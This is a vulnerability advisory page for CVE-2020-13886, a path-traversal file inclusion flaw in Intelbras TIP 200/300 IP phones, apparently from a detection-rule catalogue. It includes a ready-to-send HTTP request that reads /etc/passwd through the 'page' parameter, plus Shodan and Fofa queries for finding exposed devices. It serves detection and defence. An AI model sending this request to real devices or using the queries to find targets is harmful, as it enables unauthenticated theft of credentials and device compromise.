🔙 목록으로 돌아가기

CVE-2020-13886: Intelbras TIP 200/200 LITE/300 - Local File Inclusion

TitleIntelbras TIP 200/200 LITE/300 - Local File Inclusion
Authorritikchaddha
SeverityHigh
ImpactUnauthenticated attackers can read arbitrary files including sensitive configuration files and credentials, potentially leading to complete device compromise.
RemediationUpdate the device firmware to the latest version provided by Intelbras.
CVSS Score7.5
EPSS Score0.01809
CVE IDCVE-2020-13886
CWE IDCWE-22
Shodan Queryhtml:"/cgi-bin/cgiServer.exx"
Fofa Querybody="/cgi-bin/cgiServer.exx"
Tags cve cve2020 intelbras tip200 tip300 lfi vuln

🔍 Vulnerability Description

Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 are vulnerable to local file inclusion via the ‘page’ parameter in /cgi-bin/cgiServer.exx, allowing unauthenticated attackers to read arbitrary files such as /etc/passwd.

🌐 HTTP Request

GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13886.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13886.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A